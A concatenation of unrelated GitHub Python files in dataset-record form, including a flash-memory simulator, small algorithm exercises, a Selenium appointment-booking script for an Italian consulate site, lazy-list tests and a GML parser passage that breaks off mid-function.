\"\"\"\n b = addr - self.base\n return (self.bitmap[b // 8] & (1 << (b % 8))) == 0\n \n \n def get_highest_used(self, to_str = False):\n \"\"\" Devuelve la direccion mas alta inicializada (en bytes!)\n \"\"\"\n if to_str:\n if self.highest_used == None:\n return \"Empty\"\n else:\n return \"0x{:04x}\".format(self.highest_used)\n else:\n return self.highest_used\n \n \n def update_highest_used(self, addr):\n if (self.highest_used == None) or (addr > self.highest_used):\n self.highest_used = addr\n\n \n def save_byte(self, addr, value):\n if (addr - self.base) >= self.size:\n print(\"Acceso fuera de la memoria\")\n return\n \n self.update_highest_used(addr)\n self.mem[addr - self.base] = value\n self.mark(addr)\n \n \n def get_byte(self, addr):\n if (addr - self.base) >= self.size:\n print(\"Acceso fuera de la memoria\")\n return\n if self.empty(addr): \n return\n return self.mem[addr - self.base]\n \n \n def get_word(self, addr):\n assert (addr % 2) == 0\n \n if (addr - self.base) >= self.size:\n print(\"Acceso fuera de la memoria\")\n return\n if self.empty(addr) or self.empty(addr + 1): \n return\n return self.mem[addr - self.base] + (self.mem[addr - self.base + 1] << 8)\n \n \n def mark(self, addr):\n b = addr - self.base\n self.bitmap[b // 8] |= (1 << (b % 8))\n \n \n def dump(self):\n s = \" +0 +1 +2 +3 +4 +5 +6 +7 +8 +9 +A +B +C +D +E +F\"\n for offs in range(self.size):\n if (offs % 16) == 0:\n s += \"\\n{:04x}: \".format(offs + self.base)\n if self.empty(offs + self.base):\n s+= \"-- \"\n else:\n s += \"{:02x} \".format(self.mem[offs])\n \n return s + \"\\n\"\n \n \n def dump_words(self):\n s = \" +0 +1 +2 +3 +4 +5 +6 +7 \"\n for offs in range(0, self.size, 2):\n if (offs % 16) == 0:\n s += \"\\n{:04x}: \".format(offs + self.base)\n if self.empty(offs + self.base):\n s+= \"---- \"\n else:\n s += \"{:04x} \".format((self.mem[offs+1] << 8) + self.mem[offs])\n \n return s + \"\\n\"\n \n \n def load_intel_hex(self, fname):\n with open(fname, \"r\") as hexf:\n for line in hexf.readlines():\n line = line.rstrip('\\n ')\n if len(line) < 11:\n continue\n if line[0] != ':':\n continue\n # Linea parece contener datos\n checksum = 0\n nr_bytes = int(line[1 : 3], 16)\n checksum += nr_bytes\n addr_h = int(line[3 : 5], 16)\n checksum += addr_h\n addr_l = int(line[5 : 7], 16)\n checksum += addr_l\n kind = int(line[7 : 9], 16)\n checksum += kind\n \n addr = (addr_h << 8) + addr_l\n \n #pdb.set_trace()\n if kind == 1: # Fin del archivo?\n t = int(line[9 : 11], 16)\n checksum += t\n if (checksum & 0xff) == 0:\n break\n else:\n return False\n \n elif kind != 0:\n continue\n \n # La linea contiene datos\n for offs in range(nr_bytes):\n b = int(line[9 + offs*2 : 11 + offs*2], 16)\n checksum += b\n self.save_byte(addr + offs, b)\n \n b = int(line[-2:], 16)\n checksum += b\n if (checksum & 0xff) != 0:\n return False\n \n \n\ndef main(args):\n print(\"testing sim_mem\")\n mem = Memory(1024, Memory.FLASH)\n print(\"Highest byte used: {:s}\".format(mem.get_highest_used(True)))\n mem.save_byte(10, 0xaa)\n print(\"Highest byte used: {:s}\".format(mem.get_highest_used(True)))\n \n mem.load_intel_hex(\"validate_hex.hex\")\n print(\"Highest byte used: {:s}\".format(mem.get_highest_used(True)))\n print(mem.dump_words())\n return 0\n\nif __name__ == '__main__':\n import sys\n 
sys.exit(main(sys.argv))\n","repo_name":"NicolasGomez097/DHS-2018","sub_path":"sim_mem.py","file_name":"sim_mem.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"72143034927","text":"from src.mutation.MutationABC import MutationABC\nfrom src.classes.Genotype import Genotype\nimport random\n\n\nclass SingleGeneMutation(MutationABC):\n\n @classmethod\n def mutate(cls, genes: Genotype, probability: float) -> Genotype | None:\n new_genes = genes.to_array()\n if random.uniform(0, 1) <= probability:\n # Random selection of the gene to mutate\n rand = random.randint(0, len(new_genes) - 1)\n # check if it is the height gene\n if rand == (len(new_genes) - 1):\n # Search and replace with mutated gene\n new_genes[rand] = random.uniform(1.3, 2.0)\n else:\n # Search and replace with mutated gene\n new_genes[rand] = random.uniform(0, 150)\n return Genotype.from_array(new_genes)\n","repo_name":"elianparedes/sia","sub_path":"tp2/src/mutation/SingleGeneMutation.py","file_name":"SingleGeneMutation.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73411788845","text":"# Problem: https://codeforces.com/problemset/problem/1650/C\n# nice data structure question :\n# we store the weight of each segment in a dictionary along with the segment number\n# we then sort the dictionary by the weight\n# we then iterate through the sorted dictionary and add the segment number and return the sum\n\n\nfor _ in range(int(input())):\n s = input()\n n, m = map(int, input().split())\n d = {}\n for i in range(m):\n x, v = map(int, input().split())\n d[x] = [v, i+1]\n d = sorted(d.items(), key=lambda x: x[1][0])[:2*n]\n sm = 0\n points = []\n for i, j in d:\n sm += j[0]\n print(sm)\n d = sorted(d, key=lambda x: x[0])\n for i in range(n):\n print(d[i][1][1], d[2*n-i-1][1][1])\n print()\n","repo_name":"StarkPrince/ONLINE_JUDGES","sub_path":"codeforces/A_Weight_of_the_System_of_Nested_Segments.py","file_name":"A_Weight_of_the_System_of_Nested_Segments.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14356177903","text":"import re\n\n\ndef extract_phone(input):\n phone_regex = re.compile(r\"\\d{3} \\d{3}-\\d{4}\")\n match = phone_regex.search(input)\n if match:\n return match.group()\n return None\n\n\nprint(extract_phone(\"my number is 432 567-8976\"))\n","repo_name":"ferreret/python-bootcamp-udemy","sub_path":"34-regex/sample2.py","file_name":"sample2.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"20207657130","text":"import os\nfrom dotenv import load_dotenv\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service #Fix deprecated executable_path\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver import ChromeOptions\nfrom selenium.webdriver.support.ui import Select\nfrom datetime import datetime\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException\nfrom time import sleep\nimport logging\nimport yaml\nimport sys\nimport time\nimport random\n\nload_dotenv()\n\nlogging.basicConfig(\n 
format=\"%(levelname)s:%(message)s\",\n level=logging.INFO,\n handlers=[logging.FileHandler(\"/tmp/out.log\"), logging.StreamHandler(sys.stdout)],\n)\n\n\nclass Prenota:\n def check_file_exists(file_name):\n # parent_dir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))\n file_path = os.path.join(os.getcwd(), file_name)\n return os.path.isfile(file_path)\n\n def load_config(file_path):\n # Open the YAML file\n with open(file_path, \"r\") as file:\n # Load the YAML content into a Python dictionary\n config = yaml.safe_load(file)\n return config\n\n if __name__ == \"__main__\":\n if check_file_exists(\"files/residencia.pdf\"):\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Required files available.\"\n )\n email = os.getenv(\"username\")\n password = os.getenv(\"password\")\n user_config = load_config(\"parameters.yaml\")\n print(user_config.get(\"full_address\"))\n chrome_options = ChromeOptions() #Some changes for optimize the load\n chrome_options.add_experimental_option(\"detach\", True)\n chrome_options.add_argument(\"--start-maximized\")\n chrome_options.add_argument(\"--disable-dev-shm-usage\")\n chrome_options.add_argument('--blink-settings=imagesEnabled=false')\n chrome_options.add_argument(\"--no-sandbox\")\n driver = webdriver.Chrome(\n options=chrome_options, service=Service(ChromeDriverManager(version=\"114.0.5735.90\").install(), #Some Changes for fix deprecated executable_path\n ))\n\n try:\n driver.get(\"https://prenotami.esteri.it/\")\n # Wait for the page to fully load\n email_box = WebDriverWait(driver, 60).until(\n EC.presence_of_element_located((By.ID, \"login-email\"))\n )\n password_box = driver.find_element(By.ID, \"login-password\")\n email_box.send_keys(email)\n password_box.send_keys(password)\n time.sleep(4) #2 default\n button = driver.find_elements(\n By.XPATH, \"//button[contains(@class,'button primary g-recaptcha')]\"\n )\n button[0].click()\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Successfuly logged in.\"\n )\n time.sleep(10)#Waiting some time to fully load after login and skip errors\n\n except Exception as e:\n logging.info(f\"Exception: {e}\")\n\n for i in range(200):\n random_number = random.randint(1, 5)\n\n if user_config[\"request_type\"] == \"citizenship\":\n try:\n driver.get(\"https://prenotami.esteri.it/Services/Booking/751\")\n time.sleep(10) #Waiting some time to fully load and skip errors\n \n try:\n appts_available = driver.find_element(\n By.XPATH, \"//*[@id='WlNotAvailable']\"\n ).get_attribute(\"value\")\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Scheduling is not available right now.\"\n )\n except NoSuchElementException:\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Element WlNotAvailable not found. 
Start filling the forms.\"\n )\n file_location = os.path.join(\"files/residencia.pdf\")\n choose_file = driver.find_elements(By.ID, \"File_0\")\n choose_file[0].send_keys(file_location)\n privacy_check = driver.find_elements(By.ID, \"PrivacyCheck\")\n privacy_check[0].click()\n submit = driver.find_elements(By.ID, \"btnAvanti\")\n submit[0].click()\n with open(\"files/citizenship_form.html\", \"w\") as f:\n f.write(driver.page_source)\n break\n except Exception as e:\n logging.info(f\"Exception {e}\")\n break\t\t\n elif user_config[\"request_type\"] == \"passport\":\n try:\n time.sleep(10) #Waiting some time to fully load and skip errors \n driver.get(\"https://prenotami.esteri.it/Services/Booking/1319\")#/Booking/671\n time.sleep(5) #Waiting some time to fully load and skip errors\n #driver.get(\"https://prenotami.esteri.it/Services/Booking/671\")\n #time.sleep(10) #Waiting some time to fully load and skip errors \n\n try:\n appts_available = driver.find_element(\n By.XPATH, \"//*[@id='WlNotAvailable']\"\n ).get_attribute(\"value\")\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Scheduling is not available right now.\"\n )\n except NoSuchElementException:\n try:\n h5_element = driver.find_element(\n By.XPATH, \"//h5[contains(text(), 'Stante l')]\"\n )\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Scheduling is not available right now (H5 message).\"\n )\n except NoSuchElementException:\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Element WlNotAvailable not found. Start filling the forms.\"\n )\n\n with open(\"files/passport_form.html\", \"w\") as f:\n f.write(driver.page_source)\n\n q0 = Select(driver.find_element(By.ID,\"ddls_0\"))\n q0.select_by_visible_text(\n user_config.get(\"possess_expired_passport\")\n )\n\n q1 = Select(driver.find_element(By.ID,\"ddls_1\"))\n q1.select_by_visible_text(\n user_config.get(\"possess_expired_passport\")\n )\n\n q2 = driver.find_element(By.ID,\n \"DatiAddizionaliPrenotante_2___testo\"\n )\n q2.send_keys(user_config.get(\"total_children\"))\n\n q3 = driver.find_element(By.ID,\n \"DatiAddizionaliPrenotante_3___testo\"\n )\n q3.send_keys(user_config.get(\"full_address\"))\n\n q4 = Select(driver.find_element(By.ID,\"ddls_4\"))\n q4.select_by_visible_text(user_config.get(\"marital_status\"))\n\n time.sleep(1)\n\n file0 = driver.find_element(By.XPATH,'//*[@id=\"File_0\"]')\n file0.send_keys(os.getcwd() + \"/files/identidade.pdf\")\n\n time.sleep(1)\n\n file1 = driver.find_element(By.XPATH,'//*[@id=\"File_1\"]')\n file1.send_keys(os.getcwd() + \"/files/residencia.pdf\")\n\n checkBox = driver.find_element(By.ID,\"PrivacyCheck\")\n checkBox.click()\n\n form_submit = driver.find_element(By.ID,\"btnAvanti\")\n form_submit.click()\n\n break\n except Exception as e:\n logging.info(f\"Exception {e}\")\n break\n\n time.sleep(random_number)\n\n else:\n logging.info(\n \"Required files not available. Check the required files in readme.md file. Ending execution.\"\n )\n sys.exit(0)\n user_input = input(\n f\"Timestamp: {str(datetime.now())} - Go ahead and fill manually the rest of the process. When finished, type quit to exit the program and close the browser. 
\"\n )\n while True:\n if user_input == \"quit\":\n driver.quit()\n break","repo_name":"handreassa/prenotami","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":9657,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"27"} +{"seq_id":"36256318267","text":"odd = []\neven = []\ndata = input()\nreq = data.split(\" \")\nprint(req)\nfor i in req:\n if(i.isdigit()):\n i = int(i)\n if(i % 2 == 0):\n even.append(i)\n else:\n odd.append(i)\n\neven.sort()\nodd.sort(reverse=True)\n\nprint(even)\nprint(odd)","repo_name":"abhilashnambiar/dcodetech_python","sub_path":"data_type.py","file_name":"data_type.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8252460731","text":"from itertools import combinations\n\ndef solution(relation):\n answer = 0\n n = len(relation)\n m = len(relation[0])\n \n combi = []\n for i in range(1, n+1):\n combi.extend(combinations(range(m), i))\n \n key = []\n for c in combi:\n result = set()\n \n for i in range(n):\n temp = []\n for j in c:\n temp.append(relation[i][j])\n result.add(tuple(temp))\n \n if len(result) == n:\n flag = True\n for i in range(len(key)):\n if key[i].issubset(set(c)):\n flag = False\n break\n \n if flag:\n key.append(set(c))\n answer += 1\n \n return answer\n","repo_name":"M1nseoPark/CodingtestStudy","sub_path":"후보키.py","file_name":"후보키.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33308113236","text":"from __future__ import division\n\nimport numpy as np\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\nimport math\nimport source.helpers as helpers\nimport networkx as nx\nimport pandas as pd\nfrom matplotlib.pyplot import figure\n\nclass AlgoComparer:\n def __init__(self, algo_type):\n self.algo_type = algo_type\n if algo_type == \"TSNE\":\n self.transformation = TSNE(n_components=2)\n else:\n print(\"Transformation not available. 
Unable to compare.\")\n\n def __calc_dist_between_points(self, set_1, set_2):\n dist = 0\n for coords_1 in set_1:\n for coords_2 in set_2:\n x1 = coords_1[0]\n y1 = coords_1[1]\n x2 = coords_2[0]\n y2 = coords_2[1]\n dist += math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n return dist\n\n def __calc_dist_within_classes(self, class_names, classes_strength, classes_coords):\n classes_dist = []\n for class_index in range(len(class_names)):\n class_coords = classes_coords[class_index]\n dist = self.__calc_dist_between_points(class_coords, class_coords)\n dist /= (classes_strength[class_index] * 2) # razy 2, bo każda odległość będzie liczona dwukrotnie\n classes_dist.append(dist)\n return classes_dist\n\n def __calc_dist_between_classes(self, class_names, classes_strength, classes_coords):\n classes_dist = []\n for class_1_index in range(len(class_names)):\n dist = 0\n strength = 0\n for class_2_index in range(len(class_names)):\n if class_1_index != class_2_index:\n class_1_coords = classes_coords[class_1_index]\n class_2_coords = classes_coords[class_2_index]\n dist += self.__calc_dist_between_points(class_1_coords, class_2_coords)\n strength += classes_strength[class_1_index] + classes_strength[class_2_index]\n classes_dist.append(dist / strength)\n return classes_dist\n\n def __prepare_dist_matrices(self, class_names, labels, transformation_data):\n classes_strength = np.zeros(len(class_names))\n classes_coords = []\n for class_name_idx in range(len(class_names)):\n class_coords = []\n for index in range(len(labels)):\n if str(labels[index]) == str(class_name_idx):\n classes_strength[class_name_idx] += 1\n class_coords.append(transformation_data[index])\n classes_coords.append(class_coords)\n return (classes_strength, classes_coords)\n\n def check_method_quality(self, class_names, class_labels, transformed_data):\n (classes_strength, classes_coords) = self.__prepare_dist_matrices(class_names, class_labels, transformed_data)\n classes_inner_dist = self.__calc_dist_within_classes(class_names, classes_strength, classes_coords)\n classes_outer_dist = self.__calc_dist_between_classes(class_names, classes_strength, classes_coords)\n coeff = sum(classes_inner_dist) / sum(classes_outer_dist)\n print(coeff)\n\n def visualise_transformed(self, points_transformed, colors, labels):\n points_transformed_t = points_transformed.T\n\n fig = plt.figure()\n ax = fig.add_subplot()\n scatter = ax.scatter(points_transformed_t[0], points_transformed_t[1], c=colors, cmap=plt.cm.coolwarm)\n ax.set_xlabel('X Label')\n ax.set_ylabel('Y Label')\n ax.legend(handles=scatter.legend_elements()[0], labels=labels)\n plt.rcParams[\"figure.figsize\"] = [12, 6]\n plt.show()\n\n def compare(self, data_processor):\n self.transformed_data = self.transformation.fit_transform(data_processor.data)\n self.check_method_quality(data_processor.names, data_processor.labels, self.transformed_data)\n # self.visualise_transformed(self.transformed_data, list(map(int, data_processor.labels.tolist())),\n # data_processor.names)\n","repo_name":"ilonatommy/ShapeVis","sub_path":"program/source/algo_comparer.py","file_name":"algo_comparer.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28449007630","text":"import numpy as np\r\nimport pandas as pd\r\nfrom flask import Flask, request, jsonify, render_template\r\nimport pickle\r\n\r\napp = Flask(__name__) #Initialize the flask App\r\nmodel = pickle.load(open('model.pkl', 
'rb'))\r\n\r\n@app.route('/')\r\ndef home():\r\n    return render_template('index.html')\r\n\r\n@app.route('/predict',methods=['POST'])\r\ndef predict():\r\n    '''\r\n    For rendering results on HTML GUI\r\n    '''\r\n    int_features = [x for x in request.form.values()]\r\n    final = np.array(int_features)\r\n    data_unseen = pd.DataFrame([final], columns = ['Campaign Product Name', 'Region', 'Amount Spent (INR)']) \r\n    \r\n    prediction = model.predict(data_unseen)\r\n\r\n    output = prediction\r\n\r\n\r\n    return render_template('index.html', prediction_text='Result is {}'.format(output))\r\n\r\nif __name__ == \"__main__\":\r\n    app.run(debug=True)","repo_name":"saisurajkarra/Ad-Prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28071433743","text":"# pyright: reportMissingTypeStubs=false\nfrom dataclasses import dataclass\nfrom typing import Tuple\n\nimport numpy as np\nimport numpy.typing as npt\n\n\n@dataclass\nclass RectangularGrid:\n    \"\"\"\n    This class structures a grid of points that can be used to make up a triangulation.\n\n    The points are ordered in a rectangular form.\n\n    Attributes\n    ----------\n    x_domain: Tuple[float, float]\n        Tuple that describes the size of the domain in the x dimension.\n    y_domain: Tuple[float, float]\n        Tuple that describes the size of the domain in the y dimension.\n    x_discretisation: int\n        Integer value that describes the discretisation of the x dimension.\n    y_discretisation: int\n        Integer value that describes the discretisation of the y dimension.\n\n    Properties\n    ----------\n    x_linspace: NDArray[np.float64]\n        Array that divides the x dimension into the specified discrete points.\n    y_linspace: NDArray[np.float64]\n        Array that divides the y dimension into the specified discrete points.\n    sorted_mesh_coords: NDArray[np.float64]\n        Array with shape (n_dof,2) that describes the x and y coordinates of each point in\n        the grid. It is sorted so that all Dirichlet boundary points come last.\n\n    Methods\n    -------\n    get_reordered_idx_neumann_right\n        Returns an array of indices where all indices of Dirichlet boundary points from the\n        left side of the domain are at the end.\n    \"\"\"\n\n    x_domain: Tuple[float, float]\n    y_domain: Tuple[float, float]\n    x_discretisation: int\n    y_discretisation: int\n\n    @property\n    def x_linspace(self) -> npt.NDArray[np.float64]:\n        return np.linspace(self.x_domain[0], self.x_domain[1], self.x_discretisation)\n\n    @property\n    def y_linspace(self) -> npt.NDArray[np.float64]:\n        return np.linspace(self.y_domain[0], self.y_domain[1], self.y_discretisation)\n\n    @property\n    def sorted_mesh_coords(self) -> npt.NDArray[np.float64]:\n        \"\"\"\n        This property generates a mesh of grid points based on the given domain and discretisation.\n        The mesh array is reshaped to (n_dof,2) where the first column contains the x coordinates and the second\n        column the y coordinates of each point of the grid. 
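For an x_discretisation of nx and a y_discretisation of ny this gives n_dof = nx * ny grid points. 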
Then this Array is sorted such that all\n Dirichlet boundary points are moved to the end of the array.\n \"\"\"\n\n x_vertex_coords, y_vertex_coords = np.meshgrid(self.x_linspace, self.y_linspace)\n pre_ordered_y = np.roll(y_vertex_coords, -self.x_discretisation)\n x_vertex_coords = x_vertex_coords.flatten()\n pre_ordered_y = pre_ordered_y.flatten()\n pre_ordered_coords = np.vstack((x_vertex_coords, pre_ordered_y))\n reorder_idx = self.get_reordered_idx_neumann_right()\n split_pre_order = np.hsplit(\n pre_ordered_coords,\n np.array([self.x_discretisation * (self.y_discretisation - 2)]),\n )\n unordered_coords = split_pre_order[0]\n ordered_coords_back = split_pre_order[1].T\n ordered_coords_front: npt.NDArray[\n np.float64\n ] = unordered_coords.T[ # type:ignore\n reorder_idx\n ]\n sorted_vertices_coords = np.vstack(\n (ordered_coords_front, ordered_coords_back) # type:ignore\n )\n return sorted_vertices_coords\n\n def get_reordered_idx_dirichlet(self) -> npt.NDArray[np.int32]:\n \"\"\"\n The method is moving also the boundary terms from the left and right side to the end of the array\n of vertices. Hence, this method prepares the vertices in such a way that Dirichlet boundaries are\n assumed all around the domain.\n \"\"\"\n\n left_bdn_lst: list[int] = [\n self.x_discretisation * i for i in range(self.y_discretisation - 2)\n ]\n right_bdn_lst: list[int] = [\n (self.x_discretisation - 1) + i * self.x_discretisation\n for i in range(self.y_discretisation - 2)\n ]\n left_bdn_idx = np.array(left_bdn_lst)\n right_bdn_idx = np.array(right_bdn_lst)\n lr_bdn_id = np.hstack((left_bdn_idx, right_bdn_idx))\n complete_idx = np.arange(0, self.x_discretisation * (self.y_discretisation - 2)) # type: ignore\n inner_idx = np.setdiff1d(complete_idx, lr_bdn_id)\n reorder_idx = np.hstack((inner_idx, lr_bdn_id))\n return reorder_idx\n\n def get_reordered_idx_neumann_right(self) -> npt.NDArray[np.int32]:\n \"\"\"\n The method gives an index array which can be used to reorder the coordinate array such that also the\n boundary values from the left hand side are put to the back of the array. That way all Dirichlet\n boundary terms are moved to the end of the array. Only the Neumann boundary terms stay in their\n initial position.\n \"\"\"\n\n left_bdn_lst: list[int] = [\n self.x_discretisation * i for i in range(self.y_discretisation - 2)\n ]\n left_bdn_idx = np.array(left_bdn_lst)\n complete_idx = np.arange(0, self.x_discretisation * (self.y_discretisation - 2)) # type: ignore\n inner_idx = np.setdiff1d(complete_idx, left_bdn_idx)\n reorder_idx = np.hstack((inner_idx, left_bdn_idx))\n return reorder_idx\n\n def get_reverted_idx_neumann_right(self) -> npt.NDArray[np.int32]:\n \"\"\"\n Function to revert the reordering of the array. 
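It is intended as the inverse of the permutation produced by get_reordered_idx_neumann_right. 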
This is necessary to later reorder the solution arrays\n        back to the original order for plotting, for example, the pressure scalar field.\n        \"\"\"\n        complete_idx = np.arange(0, self.x_discretisation * (self.y_discretisation - 2))  # type: ignore\n        start_bdn_idx = (self.x_discretisation - 1) * (self.y_discretisation - 2)\n        left_bdn_lst = [start_bdn_idx + i for i in range(self.y_discretisation - 2)]\n        left_bdn_arr = np.array(left_bdn_lst)\n        for j, bdn_idx in enumerate(left_bdn_lst):\n            complete_idx = np.insert(complete_idx, j * self.y_discretisation, bdn_idx)\n        complete_idx = np.delete(complete_idx, (left_bdn_arr + len(left_bdn_lst)))\n        return complete_idx\n","repo_name":"ErikLahm/project_obstacle_flow","sub_path":"rectangular_grid.py","file_name":"rectangular_grid.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7281144582","text":"# You are given an integer array nums.\n# The two players playing a game with this array are Player 1 and Player 2.\n# Player 1 and Player 2 take turns, and Player 1 goes first.\n# Both players start the game with a score of 0.\n# On every turn, a player takes one of the numbers from either end of the array (i.e. nums[0] or nums[nums.length - 1])\n# and the size of the array shrinks by 1. The player adds the chosen number to their score.\n# The game ends when there are no elements left in the array.\n# Return true if Player 1 can win the game.\n# If both players' scores are equal, Player 1 is still the winner and true must be returned as well.\n# You may assume that both players play optimally.\n\n\n# Example 1:\n# Input: nums = [1,5,2]\n# Output: false\n# Explanation: Initially, Player 1 can choose one of 1 and 2.\n# If Player 1 chooses 2 (or 1), Player 2 can choose from 1 (or 2) and 5. If Player 2 chooses 5, Player 1 is left with 1 (or 2).\n# So Player 1's final score is 1 + 2 = 3, and Player 2's is 5.\n# Therefore Player 1 can never be the winner and false must be returned.\n\n# Example 2:\n# Input: nums = [1,5,233,7]\n# Output: true\n# Explanation: Player 1 chooses 1 first. Then Player 2 must choose one of 5 and 7. Whichever number Player 2 chooses, Player 1 can choose 233.\n# Finally, Player 1 has a higher score (234) than Player 2 (12), so true must be returned since Player 1 can win.\n\n# There are branches where Player 1 wins, but how do I make Player 2 take the largest value instead of just checking for any winning branch?\ndef DFS(x):\n    global one, two, ans\n    if len(lst) == 0:\n        print(one, two)\n        if sum(one) >= sum(two):\n            ans = True\n        return\n    if x==0:\n        # take the first element\n        one.append(lst.popleft())\n        DFS(1)\n        lst.appendleft(one.pop())\n        # take the last element\n        one.append(lst.pop())\n        DFS(1)\n        lst.append(one.pop())\n    else:\n        # take the first element\n        two.append(lst.popleft())\n        DFS(0)\n        lst.appendleft(two.pop())\n        # take the last element\n        two.append(lst.pop())\n        DFS(0)\n        lst.append(two.pop())\n\nfrom collections import deque\nimport sys\nlst = deque(list(map(int, sys.stdin.readline().split())))\none, two, ans = [], [], False\nDFS(0)\nif ans:\n    print(\"true\")\nelse:\n    print(\"false\")","repo_name":"rlagusgh0223/Algorithm","sub_path":"230917/LeetCode.py","file_name":"LeetCode.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"71640445192","text":"x = range(100, 401)\nlista=[]\nfor i in x:\n    y = str(i)\n    setki = str(y[0])\n    setki = int(setki)\n    dziesiatki = str(y[1])\n    dziesiatki = int(dziesiatki)\n    jednosci = str(y[2])\n    jednosci = int(jednosci)\n    if setki%2 == 0 and dziesiatki%2 == 0 and jednosci%2==0:\n        lista.append(i)\n\nprint (lista)\n    \n","repo_name":"kacpermisiek/JSP2019","sub_path":"lista3/lista3zadanie10.py","file_name":"lista3zadanie10.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28378959931","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nFile: test_lazy_list.py\nAuthor: SpaceLis\nEmail: 
Wen.Li@tudelft.nl\nGithub: http://github.com/spacelis\nDescription:\n Basic tests\n\"\"\"\n__author__ = 'wenli'\n\nfrom unittest import TestCase\nfrom lazylist import LazyList\nfrom lazylist import LazyListClass\n\n\nclass TestLazyList(TestCase):\n\n \"\"\" Basic Tests\"\"\"\n\n def setUp(self):\n \"\"\"\n \"\"\"\n @LazyList\n def nat():\n \"\"\" A natural number sequence. \"\"\"\n i = 1\n while True:\n yield i\n i += 1\n self.nat = nat\n\n @LazyListClass\n def Nat(x):\n \"\"\" dummy \"\"\"\n i = x\n while True:\n yield i\n i += 1\n self.Nat = Nat\n\n\n def test_LazyList(self):\n \"\"\"\n @return: None\n \"\"\"\n a = self.nat\n self.assertEqual(a[3], 4)\n\n def test_lazy_filter(self):\n \"\"\"\n\n @return: None\n \"\"\"\n a = self.nat.filtered(lambda x: x % 2 == 0)\n for i in range(1000):\n self.assertEqual(a[i] % 2, 0)\n\n def test_LzayListClass(self):\n \"\"\"\n @return: None\n \"\"\"\n a = self.Nat(10)\n self.assertEqual(a[2], 12)\n\n","repo_name":"spacelis/lazylist","sub_path":"test/test_lazy_list.py","file_name":"test_lazy_list.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6843209976","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os, sys, codecs, chardet\nimport xml.etree.ElementTree as et\nfrom lxml import etree\nfrom lxml.etree import XMLParser, parse\n\n# Define the name space.\nns_opg = \"{http://fgd.gsi.go.jp/spec/2008/FGD_GMLSchema}\"\nns_fgd = \"{http://fgd.gsi.go.jp/spec/2008/FGD_GMLSchema}\"\nns_gml = \"{http://www.opengis.net/gml/3.2}\"\nns_jmp = \"{http://zgate.gsi.go.jp/ch/jmp}\"\nns_ksj = \"{http://nlftp.mlit.go.jp/ksj/schemas/ksj-app}\"\nns_xln = \"{http://www.w3.org/1999/xlink}\"\nns_xsi = \"{http://www.w3.org/2001/XMLSchema-instance}\"\n\ndef checkEncoding(filename):\n p = XMLParser(huge_tree=True)\n \n with open(filename, 'r') as xmlfile:\n tree = etree.parse(xmlfile,parser=p)\n return(tree.docinfo.encoding.lower())\n\ndef openAndWriteDoc(filename, header, data):\n if os.path.exists(filename) != True:\n output = open(filename, \"w\")\n output.write(header)\n else:\n output = open(filename, \"a\")\n output.write(data)\n output.close()\n\ndef getGmlPoint(geom):\n point = geom.find(\".//\" + ns_gml + \"pos\").text.split(\" \")\n return \"POINT(\" + point[1] + \" \" + point[0] + \")\"\n\ndef getGmlPolyline(geom):\n parts = \"\"\n part = \"\"\n \n for seg in geom:\n posl = seg.find(\".//\" + ns_gml + \"posList\").text.strip().split(\"\\n\")\n ctrl = \"\"\n for item in posl:\n entry = item.split(\" \")\n ctrl = ctrl + entry[1] + \" \" + entry[0] + \",\"\n return \"LINESTRING(\" + ctrl.strip(\",\") + \")\"\n\ndef getGmlPolygon(geom):\n parts = \"\"\n inte = \"\"\n exte = \"\"\n \n pchs = geom.find(\".//\" + ns_gml + \"PolygonPatch\")\n \n for rngs in pchs:\n ctrl = \"\"\n if rngs.tag == ns_gml + \"exterior\":\n segs = rngs.find(\".//\" + ns_gml + \"segments\")\n for seg in segs:\n posl = seg.find(\".//\" + ns_gml + 